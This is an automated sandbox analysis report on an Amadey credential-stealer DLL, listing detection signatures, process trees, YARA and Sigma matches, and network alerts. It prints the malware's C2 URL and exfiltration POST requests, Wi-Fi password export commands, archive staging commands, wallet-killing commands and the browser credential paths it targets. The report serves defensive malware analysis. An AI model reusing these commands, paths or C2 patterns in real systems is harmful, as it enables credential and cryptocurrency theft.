Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
cred64.dll.dll

Overview

General Information

Sample name:cred64.dll.dll
(renamed file extension from exe to dll)
Original sample name:cred64.dll.exe
Analysis ID:1620559
MD5:478cf1466756aec3b32c8cc61fc5c6c6
SHA1:201c3726ce7759de084693759c405d4ff7bf4cd9
SHA256:92c5b1eae5d9f4eb47debd827d3168fb8ab989753262747c04ffee38c010e192
Tags:exeuser-skocherhan
Infos:

Detection

Amadey
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Amadeys stealer DLL
C2 URLs / IPs found in malware configuration
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Sample uses string decryption to hide its real strings
Sigma detected: Suspicious Script Execution From Temp Folder
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Instant Messenger accounts or passwords
Uses netsh to modify the Windows network and firewall settings
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Folder Compress To Potentially Suspicious Output Via Compress-Archive Cmdlet
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • loaddll64.exe (PID: 7800 cmdline: loaddll64.exe "C:\Users\user\Desktop\cred64.dll.dll" MD5: 763455F9DCB24DFEECC2B9D9F8D46D52)
    • conhost.exe (PID: 7808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7864 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\cred64.dll.dll",#1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • rundll32.exe (PID: 7916 cmdline: rundll32.exe "C:\Users\user\Desktop\cred64.dll.dll",#1 MD5: EF3179D498793BF4234F708D3BE28633)
        • netsh.exe (PID: 7976 cmdline: netsh wlan show profiles MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
          • conhost.exe (PID: 7984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 6944 cmdline: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 7344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • rundll32.exe (PID: 7892 cmdline: rundll32.exe C:\Users\user\Desktop\cred64.dll.dll,Main MD5: EF3179D498793BF4234F708D3BE28633)
      • netsh.exe (PID: 7948 cmdline: netsh wlan show profiles MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
        • conhost.exe (PID: 7956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 1732 cmdline: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 1472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • rundll32.exe (PID: 7236 cmdline: rundll32.exe C:\Users\user\Desktop\cred64.dll.dll,Save MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 7228 cmdline: rundll32.exe "C:\Users\user\Desktop\cred64.dll.dll",Main MD5: EF3179D498793BF4234F708D3BE28633)
      • netsh.exe (PID: 7732 cmdline: netsh wlan show profiles MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
        • conhost.exe (PID: 1132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 8068 cmdline: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 8016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • rundll32.exe (PID: 7284 cmdline: rundll32.exe "C:\Users\user\Desktop\cred64.dll.dll",Save MD5: EF3179D498793BF4234F708D3BE28633)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
AmadeyAmadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Malware Configuration

Threatname: Amadey

{"C2 url": "185.196.8.37/Gd85kkjf/index.php", "Version": "5.10"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
cred64.dll.dllJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
    cred64.dll.dllloader_amadey_stealer_pluginFinds Amadey\'s stealer plugin based on characteristic stringsSekoia.io
    • 0x126a3c:$str01: STEALERDLL.dll
    • 0x116d38:$str02: ?wal=1
    • 0x116c6a:$str03: Content-Disposition: form-data; name="data"; filename="
    • 0x116f70:$str09: "hostname":"([^"]+)"
    • 0x116f88:$str10: "encryptedUsername":"([^"]+)"
    • 0x116fa8:$str11: "encryptedPassword":"([^"]+)"
    • 0x11787c:$str12: &cred=

    Sigma Signatures

    System Summary

    barindex
    Sigma detected: Suspicious Script Execution From Temp Folder
    Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, CommandLine: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: rundll32.exe "C:\Users\user\Desktop\cred64.dll.dll",#1, ParentImage: C:\Windows\System32\rundll32.exe, ParentProcessId: 7916, ParentProcessName: rundll32.exe, ProcessCommandLine: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, ProcessId: 6944, ProcessName: powershell.exe
    Sigma detected: Folder Compress To Potentially Suspicious Output Via Compress-Archive Cmdlet
    Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems), frack113: Data: Command: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, CommandLine: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: rundll32.exe "C:\Users\user\Desktop\cred64.dll.dll",#1, ParentImage: C:\Windows\System32\rundll32.exe, ParentProcessId: 7916, ParentProcessName: rundll32.exe, ProcessCommandLine: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, ProcessId: 6944, ProcessName: powershell.exe
    Sigma detected: Non Interactive PowerShell Process Spawned
    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, CommandLine: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: rundll32.exe "C:\Users\user\Desktop\cred64.dll.dll",#1, ParentImage: C:\Windows\System32\rundll32.exe, ParentProcessId: 7916, ParentProcessName: rundll32.exe, ProcessCommandLine: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, ProcessId: 6944, ProcessName: powershell.exe

    Stealing of Sensitive Information

    barindex
    Sigma detected: Capture Wi-Fi password
    Source: Process startedAuthor: Joe Security: Data: Command: netsh wlan show profiles, CommandLine: netsh wlan show profiles, CommandLine|base64offset|contains: l, Image: C:\Windows\System32\netsh.exe, NewProcessName: C:\Windows\System32\netsh.exe, OriginalFileName: C:\Windows\System32\netsh.exe, ParentCommandLine: rundll32.exe C:\Users\user\Desktop\cred64.dll.dll,Main, ParentImage: C:\Windows\System32\rundll32.exe, ParentProcessId: 7892, ParentProcessName: rundll32.exe, ProcessCommandLine: netsh wlan show profiles, ProcessId: 7948, ProcessName: netsh.exe

    Suricata Signatures

    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2025-02-21T01:52:20.345564+010028552391A Network Trojan was detected192.168.2.1049701185.196.8.3780TCP
    2025-02-21T01:52:20.354455+010028552391A Network Trojan was detected192.168.2.1049702185.196.8.3780TCP
    2025-02-21T01:52:25.522638+010028552391A Network Trojan was detected192.168.2.1049729185.196.8.3780TCP

    Joe Sandbox Signatures

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Antivirus detection for URL or domain
    Source: http://185.196.8.37/Gd85kkjf/index.phpAvira URL Cloud: Label: malware
    Source: http://185.196.8.37/Gd85kkjf/index.php?wal=1es5Avira URL Cloud: Label: malware
    Source: http://185.196.8.37/Gd85kkjf/index.php?wal=1=Avira URL Cloud: Label: malware
    Source: http://185.196.8.37/Gd85kkjf/index.php?wal=1Avira URL Cloud: Label: malware
    Source: http://185.196.8.37/Gd85kkjf/index.php?wal=1XyHAvira URL Cloud: Label: malware
    Source: http://185.196.8.37/Gd85kkjf/index.php#Avira URL Cloud: Label: malware
    Source: http://185.196.8.37/Gd85kkjf/index.php?wal=1sAvira URL Cloud: Label: malware
    Source: http://185.196.8.37/Gd85kkjf/index.php?wal=1bAvira URL Cloud: Label: malware
    Source: http://185.196.8.37/Gd85kkjf/index.php?wal=1rerAvira URL Cloud: Label: malware
    Source: http://185.196.8.37/Gd85kkjf/index.php?wal=1(Avira URL Cloud: Label: malware
    Found malware configuration
    Source: cred64.dll.dllMalware Configuration Extractor: Amadey {"C2 url": "185.196.8.37/Gd85kkjf/index.php", "Version": "5.10"}
    Multi AV Scanner detection for submitted file
    Source: cred64.dll.dllReversingLabs: Detection: 68%
    Source: cred64.dll.dllVirustotal: Detection: 77%Perma Link
    Joe Sandbox ML detected suspicious sample
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.0% probability
    Sample uses string decryption to hide its real strings
    Source: 00000012.00000002.1584469285.000001D6A15F8000.00000004.00000020.00020000.00000000.sdmpString decryptor: \dictionaries
    Source: 00000012.00000002.1584469285.000001D6A15F8000.00000004.00000020.00020000.00000000.sdmpString decryptor: tdata\key_datas
    Source: 00000012.00000002.1584469285.000001D6A15F8000.00000004.00000020.00020000.00000000.sdmpString decryptor: /Gd85kkjf/index.php
    Source: 00000012.00000002.1584469285.000001D6A15F8000.00000004.00000020.00020000.00000000.sdmpString decryptor: 185.196.8.37
    Source: 00000012.00000002.1584469285.000001D6A15F8000.00000004.00000020.00020000.00000000.sdmpString decryptor: Exodus\exodus.wallet\
    Source: 00000012.00000002.1584469285.000001D6A15F8000.00000004.00000020.00020000.00000000.sdmpString decryptor: _Electrum(
    Source: 00000012.00000002.1584469285.000001D6A15F8000.00000004.00000020.00020000.00000000.sdmpString decryptor: electrum_data\wallets
    Source: 00000012.00000002.1584469285.000001D6A15F8000.00000004.00000020.00020000.00000000.sdmpString decryptor: Electrum.exe
    Source: 00000012.00000002.1584469285.000001D6A15F8000.00000004.00000020.00020000.00000000.sdmpString decryptor: Electrum\wallets
    Source: 00000012.00000002.1584469285.000001D6A15F8000.00000004.00000020.00020000.00000000.sdmpString decryptor: Litecoin\wallets
    Source: 00000012.00000002.1584469285.000001D6A15F8000.00000004.00000020.00020000.00000000.sdmpString decryptor: DashCore\wallets\
    Source: 00000012.00000002.1584469285.000001D6A15F8000.00000004.00000020.00020000.00000000.sdmpString decryptor: _Telegram(
    Source: 00000012.00000002.1584469285.000001D6A15F8000.00000004.00000020.00020000.00000000.sdmpString decryptor: \user_data
    Source: 00000012.00000002.1584469285.000001D6A15F8000.00000004.00000020.00020000.00000000.sdmpString decryptor: \logins.json
    Source: 00000012.00000002.1584469285.000001D6A15F8000.00000004.00000020.00020000.00000000.sdmpString decryptor: Taskkill /IM "Atomic Wallet.exe" /F
    Source: 00000012.00000002.1584469285.000001D6A15F8000.00000004.00000020.00020000.00000000.sdmpString decryptor: \Google\Chrome\User Data\Default\Login Data
    Source: 00000012.00000002.1584469285.000001D6A15F8000.00000004.00000020.00020000.00000000.sdmpString decryptor: \Opera Software\Opera Stable\Login Data
    Source: 00000012.00000002.1584469285.000001D6A15F8000.00000004.00000020.00020000.00000000.sdmpString decryptor: \Opera Software\Opera Stable\Local State
    Source: 00000012.00000002.1584469285.000001D6A15F8000.00000004.00000020.00020000.00000000.sdmpString decryptor: \Microsoft\Edge\User Data\Default\Login Data
    Source: 00000012.00000002.1584469285.000001D6A15F8000.00000004.00000020.00020000.00000000.sdmpString decryptor: \Google\Chrome\User Data\Local State
    Source: 00000012.00000002.1584469285.000001D6A15F8000.00000004.00000020.00020000.00000000.sdmpString decryptor: \SputnikLab\Sputnik\User Data\Local State
    Source: 00000012.00000002.1584469285.000001D6A15F8000.00000004.00000020.00020000.00000000.sdmpString decryptor: \Chromium\User Data\Default\Login Data
    Source: 00000012.00000002.1584469285.000001D6A15F8000.00000004.00000020.00020000.00000000.sdmpString decryptor: \Orbitum\User Data\Default\Login Data
    Source: 00000012.00000002.1584469285.000001D6A15F8000.00000004.00000020.00020000.00000000.sdmpString decryptor: \Comodo\Dragon\User Data\Local State
    Source: 00000012.00000002.1584469285.000001D6A15F8000.00000004.00000020.00020000.00000000.sdmpString decryptor: \Comodo\Dragon\User Data\Default\Login Data
    Source: 00000012.00000002.1584469285.000001D6A15F8000.00000004.00000020.00020000.00000000.sdmpString decryptor: \Microsoft\Edge\User Data\Local State
    Source: 00000012.00000002.1584469285.000001D6A15F8000.00000004.00000020.00020000.00000000.sdmpString decryptor: \CocCoc\Browser\User Data\Default\Login Data
    Source: 00000012.00000002.1584469285.000001D6A15F8000.00000004.00000020.00020000.00000000.sdmpString decryptor: \CocCoc\Browser\User Data\Local State
    Source: 00000012.00000002.1584469285.000001D6A15F8000.00000004.00000020.00020000.00000000.sdmpString decryptor: \Vivaldi\User Data\Default\Login Data
    Source: 00000012.00000002.1584469285.000001D6A15F8000.00000004.00000020.00020000.00000000.sdmpString decryptor: \Mozilla\Firefox\Profiles\
    Source: 00000012.00000002.1584469285.000001D6A15F8000.00000004.00000020.00020000.00000000.sdmpString decryptor: Taskkill /IM ArmoryQt.exe /F
    Source: 00000012.00000002.1584469285.000001D6A15F8000.00000004.00000020.00020000.00000000.sdmpString decryptor: \Chromium\User Data\Local State
    Source: 00000012.00000002.1584469285.000001D6A15F8000.00000004.00000020.00020000.00000000.sdmpString decryptor: \Vivaldi\User Data\Local State
    Source: 00000012.00000002.1584469285.000001D6A15F8000.00000004.00000020.00020000.00000000.sdmpString decryptor: Taskkill /IM litecoin-qt.exe /F
    Source: 00000012.00000002.1584469285.000001D6A15F8000.00000004.00000020.00020000.00000000.sdmpString decryptor: Taskkill /IM dash-qt.exe /F
    Source: 00000012.00000002.1584469285.000001D6A15F8000.00000004.00000020.00020000.00000000.sdmpString decryptor: \Orbitum\User Data\Local State
    Source: 00000012.00000002.1584469285.000001D6A15F8000.00000004.00000020.00020000.00000000.sdmpString decryptor: \Chedot\User Data\Local State
    Source: 00000012.00000002.1584469285.000001D6A15F8000.00000004.00000020.00020000.00000000.sdmpString decryptor: netsh wlan export profile name=
    Source: 00000012.00000002.1584469285.000001D6A15F8000.00000004.00000020.00020000.00000000.sdmpString decryptor: Local Settings\Software\Microsoft\Windows\Shell\MuiCache
    Source: 00000012.00000002.1584469285.000001D6A15F8000.00000004.00000020.00020000.00000000.sdmpString decryptor: Local Settings\Software\Microsoft\Windows\Shell\MuiCache
    Source: 00000012.00000002.1584469285.000001D6A15F8000.00000004.00000020.00020000.00000000.sdmpString decryptor: \SputnikLab\Sputnik\User Data\Default\Login Data
    Source: 00000012.00000002.1584469285.000001D6A15F8000.00000004.00000020.00020000.00000000.sdmpString decryptor: _Desktop.zip
    Source: 00000012.00000002.1584469285.000001D6A15F8000.00000004.00000020.00020000.00000000.sdmpString decryptor: atomic\Local Storage\
    Source: 00000012.00000002.1584469285.000001D6A15F8000.00000004.00000020.00020000.00000000.sdmpString decryptor: key=clear
    Source: 00000012.00000002.1584469285.000001D6A15F8000.00000004.00000020.00020000.00000000.sdmpString decryptor: Telegram.exe
    Source: 00000012.00000002.1584469285.000001D6A15F8000.00000004.00000020.00020000.00000000.sdmpString decryptor: CentBrowser
    Source: 00000012.00000002.1584469285.000001D6A15F8000.00000004.00000020.00020000.00000000.sdmpString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FeatureUsage\AppSwitched
    Source: 00000012.00000002.1584469285.000001D6A15F8000.00000004.00000020.00020000.00000000.sdmpString decryptor: \CentBrowser\User Data\Local State
    Source: 00000012.00000002.1584469285.000001D6A15F8000.00000004.00000020.00020000.00000000.sdmpString decryptor: \CentBrowser\User Data\Default\Login Data
    Source: 00000012.00000002.1584469285.000001D6A15F8000.00000004.00000020.00020000.00000000.sdmpString decryptor: \Chedot\User Data\Default\Login Data
    Source: 00000012.00000002.1584469285.000001D6A15F8000.00000004.00000020.00020000.00000000.sdmpString decryptor: fG`z]5
    Source: 00000012.00000002.1584469285.000001D6A15F8000.00000004.00000020.00020000.00000000.sdmpString decryptor: fG`z]5
    Source: cred64.dll.dllStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
    Source: Binary string: ws\dll\mscorlib.pdb source: powershell.exe, 0000000E.00000002.1476961727.000002C936CA0000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 0000000E.00000002.1355416212.000002C91CA5D000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: .pdbpdblib.pdb}k source: powershell.exe, 00000016.00000002.1568675841.00000191CB620000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: *on.pdbVu+ source: powershell.exe, 00000016.00000002.1570208304.00000191CB850000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000016.00000002.1572082555.00000191CB8F9000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: lambda_methodb.pdb source: powershell.exe, 0000000E.00000002.1356517077.000002C91E9BC000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb1f source: powershell.exe, 00000016.00000002.1572082555.00000191CB91E000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.Management.Automation.pdbA- source: powershell.exe, 0000000E.00000002.1476961727.000002C936CA0000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: n.pdb source: powershell.exe, 00000016.00000002.1573769341.00000191CB97E000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: lib.pdb source: powershell.exe, 0000000E.00000002.1476961727.000002C936CA0000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: scorlib.pdb source: powershell.exe, 00000016.00000002.1568675841.00000191CB620000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: softy.pdbtti source: powershell.exe, 0000000E.00000002.1472153187.000002C936BF1000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: softy.pdbllH source: powershell.exe, 0000000E.00000002.1472153187.000002C936BF1000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: mscorlib.pdbCLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000016.00000002.1572082555.00000191CB91E000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.Core.pdb source: powershell.exe, 00000016.00000002.1572082555.00000191CB8F9000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000016.00000002.1572082555.00000191CB91E000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000016.00000002.1570208304.00000191CB850000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: D:\Mktmp\StealerDLL\x64\Release\STEALERDLL.pdb source: cred64.dll.dll
    Source: Binary string: rlib.pdb source: powershell.exe, 00000016.00000002.1572082555.00000191CB8F9000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.Core.pdbk source: powershell.exe, 00000016.00000002.1572082555.00000191CB8F9000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: mscorlib.pdberShell.Commands.Utility.pdb source: powershell.exe, 0000000E.00000002.1476961727.000002C936CA0000.00000004.00000020.00020000.00000000.sdmp
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppDataJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\Music\desktop.iniJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\OneDrive\desktop.iniJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\userJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\Videos\desktop.iniJump to behavior

    Networking

    barindex
    Suricata IDS alerts for network traffic
    Source: Network trafficSuricata IDS: 2855239 - Severity 1 - ETPRO MALWARE Win32/Amadey Stealer Activity M4 (POST) : 192.168.2.10:49729 -> 185.196.8.37:80
    Source: Network trafficSuricata IDS: 2855239 - Severity 1 - ETPRO MALWARE Win32/Amadey Stealer Activity M4 (POST) : 192.168.2.10:49702 -> 185.196.8.37:80
    Source: Network trafficSuricata IDS: 2855239 - Severity 1 - ETPRO MALWARE Win32/Amadey Stealer Activity M4 (POST) : 192.168.2.10:49701 -> 185.196.8.37:80
    System process connects to network (likely due to code injection or exploit)
    Source: C:\Windows\System32\rundll32.exeNetwork Connect: 185.196.8.37 80Jump to behavior
    C2 URLs / IPs found in malware configuration
    Source: Malware configuration extractorIPs: 185.196.8.37
    Source: global trafficHTTP traffic detected: POST /Gd85kkjf/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.196.8.37Content-Length: 21Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 63 72 65 64 3d Data Ascii: id=246122658369&cred=
    Source: global trafficHTTP traffic detected: POST /Gd85kkjf/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.196.8.37Content-Length: 21Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 63 72 65 64 3d Data Ascii: id=246122658369&cred=
    Source: global trafficHTTP traffic detected: POST /Gd85kkjf/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.196.8.37Content-Length: 21Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 63 72 65 64 3d Data Ascii: id=246122658369&cred=
    Source: global trafficHTTP traffic detected: POST /Gd85kkjf/index.php?wal=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----NjE0Ng==Host: 185.196.8.37Content-Length: 6306Cache-Control: no-cache
    Source: global trafficHTTP traffic detected: POST /Gd85kkjf/index.php?wal=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----NjE0Ng==Host: 185.196.8.37Content-Length: 6306Cache-Control: no-cache
    Source: Joe Sandbox ViewASN Name: SIMPLECARRER2IT SIMPLECARRER2IT
    Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.37
    Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.37
    Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.37
    Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.37
    Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.37
    Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.37
    Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.37
    Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.37
    Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.37
    Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.37
    Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.37
    Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.37
    Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.37
    Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.37
    Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.37
    Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.37
    Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.37
    Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.37
    Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.37
    Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.37
    Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.37
    Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.37
    Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.37
    Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.37
    Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.37
    Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.37
    Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.37
    Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.37
    Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.37
    Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.37
    Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.37
    Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.37
    Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.37
    Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.37
    Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.37
    Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.37
    Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.37
    Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.37
    Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.37
    Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.37
    Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.37
    Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.37
    Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.37
    Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.37
    Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.37
    Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.37
    Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.37
    Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.37
    Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.37
